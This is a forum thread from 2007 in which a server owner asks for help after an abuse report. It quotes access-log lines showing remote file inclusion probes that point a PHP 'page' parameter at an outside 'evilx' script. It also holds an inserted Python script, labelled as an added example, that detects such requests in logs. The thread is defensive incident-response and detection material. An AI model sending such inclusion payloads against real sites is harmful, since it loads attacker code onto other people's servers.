Full Version: server possibly compromised...need help.
The Planet Forums > Security > General Security > UNIX Security
jackercrack
Hi,
I received an abuse report from 'The Planet' saying that my server was being used to brute force attack other servers. Below is an excerpt of the log file they gave me.
-----------------------------------------------------------
216.127.xx.xx - - [08/Jul/2007:00:18:08 +0200] www.europeanexperts.org GET /*.php?page=http://www.freewebtown.com/sclipicios/evilx? HTTP/1.1 403 2559

216.127.xx.xx - - [08/Jul/2007:00:18:03 +0200] www.europeanexperts.org GET /question/*.php?page=http://www.freewebtown.com/sclipicios/evilx? HTTP/1.1 200 -
-----------------------------------------------------------

Need some help tracking down what's going on.

I found an evil.txt and evil.txt.1 in my /tmp which are obviously some kind of exploit code and I'm fairly sure they got in there through a particular site that had register_globals turned off. My problem is how do I figure out what script/program etc. is launching the attacks against other servers. Also how can I tell if the scripts in the /tmp were actually executed etc. The server is near its end of life as far as I'm concerned.

My main concern right now is to stop the outward attacks for a few weeks so I can get the stuff off the server and shut it down.
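The two log lines above are classic remote file inclusion (RFI) probes: a `page=` parameter pointing at a URL on another host, one answered with 403 and one with 200. The script below is an added example (not part of this thread, not from The Planet) that parses access-log lines in that vhost format and flags every request whose query string carries a remote URL, so you can grep your own vhosts for the script that accepted the include. It assumes the log layout shown in the excerpt; the third sample line is constructed as a benign control.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Access-log layout as in the abuse report: client - - [time] vhost METHOD target HTTP/x.y status bytes
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] (?P<vhost>\S+) '
    r'(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+ (?P<status>\d{3}) (?P<bytes>\S+)$'
)
REMOTE_SCHEMES = ("http://", "https://", "ftp://")

# First two lines are from the abuse report above; the third is a constructed benign request.
SAMPLE_LOG = [
    "216.127.xx.xx - - [08/Jul/2007:00:18:08 +0200] www.europeanexperts.org "
    "GET /*.php?page=http://www.freewebtown.com/sclipicios/evilx? HTTP/1.1 403 2559",
    "216.127.xx.xx - - [08/Jul/2007:00:18:03 +0200] www.europeanexperts.org "
    "GET /question/*.php?page=http://www.freewebtown.com/sclipicios/evilx? HTTP/1.1 200 -",
    "10.0.0.5 - - [08/Jul/2007:00:20:00 +0200] www.europeanexperts.org "
    "GET /question/index.php?page=about HTTP/1.1 200 1873",
]


def parse_line(line):
    """Split one log line into its fields, or return None if it does not match."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def find_rfi(lines):
    """Return one finding per request whose query string tries to include a remote URL."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        query = urlsplit(rec["target"]).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            if value.lower().startswith(REMOTE_SCHEMES):
                status = int(rec["status"])
                findings.append({
                    "client": rec["client"],
                    "vhost": rec["vhost"],
                    "script": urlsplit(rec["target"]).path,
                    "param": name,
                    "include_url": value,
                    "status": status,
                    # 2xx: the script ran and served a response; 403: the request was refused
                    "served": 200 <= status < 300,
                })
    return findings


if __name__ == "__main__":
    for f in find_rfi(SAMPLE_LOG):
        print(f["vhost"], f["script"], f["param"], f["status"], "SERVED" if f["served"] else "blocked")
```

Feed it `access_log` for each vhost and sort the hits with `served` set to True: those name the script and parameter that actually fetched the remote file, which is where the /tmp payloads most likely came from.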
newexpos
QUOTE (jackercrack @ Jul 9 2007, 11:27 PM)
I don't know the ACTUAL script it's running off the top of my head, but evilx is part of an attempt to exploit PHPnuke to find security holes. Start with the sites with PHPnuke.